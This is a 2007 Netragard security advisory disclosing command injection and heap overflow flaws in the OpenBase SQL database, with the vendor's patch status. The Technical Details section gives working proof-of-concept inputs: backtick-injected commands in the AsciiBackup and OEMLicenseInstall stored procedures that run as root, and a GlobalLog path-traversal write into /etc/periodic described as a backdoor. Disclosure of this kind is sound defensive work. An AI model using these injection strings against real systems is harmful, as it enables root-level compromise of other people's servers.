********************** Netragard, L.L.C Advisory* ********************** Penetration Testing - Vulnerability Assessments - Web Application Security Strategic Reconnaissance Team ------------------------------------------------ http://www.netragard.com -- "We make I.T. Safe." [POSTING NOTICE] -------------------------------------------------------------------------- If you intend to post this advisory on your web page please create a clickable link back to the original Netragard advisory as the contents of the advisory may be updated. The advisory can be found on the Netragard website at http://www.netragard.com/ For more information about Netragard visit http://www.netragard.com [Advisory Information] -------------------------------------------------------------------------- Contact : Adriel T. Desautels Researcher : Kevin Finisterre Advisory ID : NETRAGARD-20070313 Product Name : OpenBase SQL Relational Database Product Version : <= OpenBase 10.0.5 (All Platforms) Vendor Name : OpenBase International, Ltd. Type of Vulnerability : Remote Buffer Overflow, Command injection Effort : Easy [Product Description] -------------------------------------------------------------------------- "For over a decade, the OpenBase family of products have been enabling some of the most innovative business applications at work today. With thousands of customers worldwide, OpenBase has become a brand that companies can rely on. OpenBase customers include AT&T, Adobe Systems, Canon, Walt Disney, First National Bank of Chicago, MCI, Motorola, Apple, The Sharper Image and many other innovators worldwide." -- http://openbase.com/home-Aboutus.html -- [Technical Summary] -------------------------------------------------------------------------- Netragard's SNOsoft Research Team discovered two critical vulnerabilities in the OpenBase SQL Relational Database that can lead to full system compromise. The first vulnerability discovered is a command injection vulnerability that affects several of the default Stored Proceedures. Specifically, it is possible to execute system commands as the root user by inserting a series of backticks into the pre-defined Stored Proceedures. The second vulnerability discovered in Buffer Overflow that causes heap corruption. This also has the potential to lead to the execution of arbitrary code or a Denial of Service condition. [Technical Details] -------------------------------------------------------------------------- 1. call AsciiBackup('\`id\`') results in commands being run as root. desktop:/tmp kfinisterre$ tail -f /tmp/isql_messages OpenBase ISQL version 8.0 for MacOS X Copyright (c) 1993-2003 OpenBase International. Ltd. All Rights Reserved. Using database 'WOMovies' on host 'localhost' Could not write file:uid=0(root) gid=0(wheel) groups=0(wheel)/WOMovies.bck 2. call GlobalLog("../../../path/to/file", "\n user input goes here \n") results in root owned files being created. Combine with above for an easy backdoor. openbase 1> call GlobalLog("../../../../../../etc/periodic/daily/600" , "\n/usr/bin/id > /tmp/file\n") openbase 2> go Data returned... calculating column widths return_0 ---------- Success ---------- 1 rows returned - 0.039 seconds (printed in 0.039 seconds) openbase 1> call AsciiBackup('`chmod +x /etc/periodic/daily/600.msg; /usr/sbin/periodic daily`') openbase 2> go Data returned... calculating column widths return_0 ---------- Failure ---------- 1 rows returned - 1.825 seconds (printed in 1.826 seconds) openbase 1> 3. select aaaaaaaaaaaaaaaaaaaa... from aaaaaaaaaaaaaaaaaaa... results in zone_free() issues referencing 0x61616161 4. call OEMLicenseInstall("`/usr/bin/id>/tmp/aaax`","`/usr/bin/id>/tmp/bbbx `","`/usr/bin/id>/tmp/ddddx`","`/usr/bin/id>/tmp/cdfx`") results in commands being run as root An exploitable vulnerability exists in OpenBase that can be used to gain NT AUTHORITY\SYSTEM or root privileges on an affected system. This vulnerability exists in the usage of Stored Procedures. If a user creates a procedure with an overly long name OpenBase may crash due to memory corruption. Memory may be corrupted in such a manor that an attacker can run arbitrary shellcode of his or her choice. [Proof Of Concept] -------------------------------------------------------------------------- See Above [Vendor Status] -------------------------------------------------------------------------- Vendor Notified on 03/05/07 Vendor Patched on 03/09/07 Vendor has stated the following: OpenBase now runs as the "openbase" user for security reasons. I would like to publically thank Kevin Finisterre for his input. [Disclaimer] ------------------------http://www.netragard.com-------------------------- Netragard, L.L.C. assumes no liability for the use of the information provided in this advisory. This advisory was released in an effort to help the I.T. community protect themselves against a potentially dangerous security hole. This advisory is not an attempt to solicit business.